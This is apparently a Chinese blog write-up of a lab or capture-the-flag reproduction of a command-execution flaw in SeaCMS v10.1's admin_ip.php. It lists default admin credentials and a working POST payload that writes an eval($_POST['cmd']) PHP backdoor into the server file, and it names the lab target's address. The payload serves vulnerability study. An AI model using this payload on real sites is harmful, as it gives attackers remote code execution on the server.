1、产品简介
海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。
2、漏洞概述
SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。
3、影响范围
v10.1
4、漏洞知识
1、审计
寻找用户可控参数,且存在对用户输入没有或处理不完全情况,直接写入文件,攻击者可利用该漏洞执行恶意代码,获取服务器权限。
2、环境
将php后门代码写入到是php的文件里面,然后再连接该php文件。
5、漏洞复现
1、开启靶场访问IP 后台路径:/manager 后台密码:admin:admin

2、点击系统---->后台ip安全设置 点击确认,并抓包

3、 POST提交的数据中写入后门连接代码 v=0&ip=+11111111111";eval($_POST['cmd']);//

4、访问写入的页面 http://123.58.224.8:44871/manager/admin_ip.php 回显正常

5、后门连接

6、获取flag

&spm=1001.2101.3001.5002&articleId=127478858&d=1&t=3&u=76b2df203a0045da976e209360ea5cee)
9899

被折叠的 条评论
为什么被折叠?



